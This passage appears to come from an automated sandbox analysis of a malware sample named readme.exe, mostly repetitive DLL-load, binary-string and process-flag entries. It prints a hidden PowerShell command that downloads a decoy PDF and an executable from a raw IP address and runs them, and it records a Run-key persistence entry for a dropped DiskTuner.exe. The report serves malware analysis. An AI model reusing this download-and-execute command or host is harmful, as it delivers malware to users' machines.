                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeSection loaded: wsock32.dll
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeSection loaded: wininet.dll
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeSection loaded: k7rn7l32.dll
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeSection loaded: ntd3ll.dll
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mswsock.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: Binary string: wkernel32.pdb source: readme.exe, 00000017.00000003.1622791871.0000000003070000.00000004.00000001.00020000.00000000.sdmp, readme.exe, 00000017.00000003.1622665787.0000000002F50000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.1631257848.00000000031E0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.1631370120.0000000004F30000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: readme.exe, 00000017.00000003.1623131121.0000000002F50000.00000004.00000001.00020000.00000000.sdmp, readme.exe, 00000017.00000003.1623575797.0000000003170000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.1631623482.0000000004EB0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.1631831483.00000000050D0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: readme.exe, 00000017.00000003.1621086501.0000000002F50000.00000004.00000001.00020000.00000000.sdmp, readme.exe, 00000017.00000003.1621282382.0000000003140000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.1630157452.00000000050A0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.1629165044.0000000004EB0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: readme.exe, 00000017.00000003.1622057721.00000000030F0000.00000004.00000001.00020000.00000000.sdmp, readme.exe, 00000017.00000003.1621817022.0000000002F50000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.1630631073.0000000004EB0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.1631008255.0000000005050000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: readme.exe, 00000017.00000003.1621086501.0000000002F50000.00000004.00000001.00020000.00000000.sdmp, readme.exe, 00000017.00000003.1621282382.0000000003140000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.1630157452.00000000050A0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.1629165044.0000000004EB0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: readme.exe, 00000017.00000003.1622057721.00000000030F0000.00000004.00000001.00020000.00000000.sdmp, readme.exe, 00000017.00000003.1621817022.0000000002F50000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.1630631073.0000000004EB0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.1631008255.0000000005050000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdbUGP source: readme.exe, 00000017.00000003.1622791871.0000000003070000.00000004.00000001.00020000.00000000.sdmp, readme.exe, 00000017.00000003.1622665787.0000000002F50000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.1631257848.00000000031E0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.1631370120.0000000004F30000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdbUGP source: readme.exe, 00000017.00000003.1623131121.0000000002F50000.00000004.00000001.00020000.00000000.sdmp, readme.exe, 00000017.00000003.1623575797.0000000003170000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.1631623482.0000000004EB0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000018.00000003.1631831483.00000000050D0000.00000004.00000001.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.pdf" -OutFile "$env:temp\readme.pdf" ; Start-Process 'msedge.exe' -ArgumentList \"--kiosk $env:temp\readme.pdf\" ; IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.exe" -OutFile "$env:temp\readme.exe" ; start "$env:temp\readme.exe""
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.pdf" -OutFile "$env:temp\readme.pdf" ; Start-Process 'msedge.exe' -ArgumentList \"--kiosk $env:temp\readme.pdf\" ; IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.exe" -OutFile "$env:temp\readme.exe" ; start "$env:temp\readme.exe""Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 19_2_004D7960 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,19_2_004D7960
                      Source: readme.exe.3.drStatic PE information: real checksum: 0x241059 should be: 0x2a4026
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFAAC7900BD pushad ; iretd 3_2_00007FFAAC7900C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFAAC79471A push eax; ret 3_2_00007FFAAC79475D
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 19_2_004CA770 push eax; ret 19_2_004CA784
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 19_2_004CA770 push eax; ret 19_2_004CA7AC
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_3_007AB86D push ebx; ret 23_3_007AB864
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_3_007AA840 push ebp; retf 23_3_007AA841
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_3_007AE83C pushad ; ret 23_3_007AE841
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_3_007AE80E push eax; iretd 23_3_007AE81D
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_3_007AA0F9 push FFFFFF82h; iretd 23_3_007AA0FB
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_3_007AD8A0 push 0000002Eh; iretd 23_3_007AD8A2
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_3_007A8904 push ecx; ret 23_3_007A8917
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_3_007AB1DD push eax; ret 23_3_007AB1DF
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_3_007AE586 pushad ; retf 23_3_007AE599
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_3_007A9F6A push eax; ret 23_3_007A9F75
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_3_007AB70B push ebx; ret 23_3_007AB864
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_2_004381E0 push ecx; retf 23_2_004382AC
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_2_004381A0 push ecx; retf 23_2_004382AC
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_2_004CA770 push eax; ret 23_2_004CA784
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_2_004CA770 push eax; ret 23_2_004CA7AC
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_2_00434C60 push edi; retf 23_2_00434D5F
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_2_00434CF0 push edi; retf 23_2_00434D5F
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_2_00434C90 push edi; retf 23_2_00434D5F
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_2_00434CB0 push edi; retf 23_2_00434D5F
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_2_00447D60 push ecx; retf 23_2_00447E0D
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 23_2_00436DB0 push ecx; retf 23_2_00436EEF
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 24_3_0079225D push eax; ret 24_3_0079225F
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 24_3_00796012 push 00000038h; iretd 24_3_0079601D
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 24_3_00795606 pushad ; retf 24_3_00795619
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 24_3_007928ED push ebx; ret 24_3_007928E4
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 24_3_007918C0 push ebp; retf 24_3_007918C1
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 24_3_007958BC pushad ; ret 24_3_007958C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\readme.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeFile created: C:\Users\user\Videos\DiskTuner\Bin\DiskTuner.exeJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\readme.pdfJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DiskTuner
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DiskTuner

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 18960
                      Source: unknownNetwork traffic detected: HTTP traffic on port 18960 -> 49701
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 18960
                      Source: unknownNetwork traffic detected: HTTP traffic on port 18960 -> 49701
                      Source: C:\Users\user\AppData\Local\Temp\readme.exeCode function: 19_2_004D7960 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,19_2_004D7960
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
